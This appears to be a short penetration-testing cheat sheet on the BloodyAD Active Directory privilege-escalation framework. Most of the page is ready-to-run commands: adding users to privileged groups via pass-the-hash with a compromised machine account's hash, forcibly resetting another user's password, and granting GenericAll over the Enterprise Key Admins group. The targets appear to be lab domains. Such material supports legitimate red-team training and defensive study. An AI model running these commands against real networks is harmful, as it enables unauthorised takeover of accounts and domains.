BloodyAD

BloodyAD is an Active Directory Privilege Escalation Framework

BloodyAD can be used as an alternative to PowerView to execute (for example) the following actions:

  • Add member to group (AddMember)

  • Set new password for user (ForceChangePassword)

This is possible from Kali, this makes it so you don't need to execute PowerView commands from a compromised host.

Add member to group (pass the hash)

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "ZPH-SVRMGMT1$" -p 00000000000000000000000000000000:89d0b56874fAAAAA8bad336a77b8ef2f add groupMember 'GENERAL MANAGEMENT' 'Marcus'

Where -u and -p contain credentials of a compromised machine account.

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "JAMIE" -p Password123\! add groupMember 'CA MANAGERS' 'JAMIE'

Force change password

python3 bloodyAD.py --host "192.168.210.10" -d "zsm.local" -u "Marcus" -p Password123 set password Jamie Password123\!

Where -u and -p contain credentials of a compromised user.

Add GenericAll

We add our user pentest1 to the group utilizing a PTH attack:

python3 bloodyAD.py --host "10.70.2.21" -d "FAKE.intra" -u "DC01$" -p :73d6af...b3a0d689a add genericAll "ENTERPRISE KEY ADMINS" "pentest1"

Last updated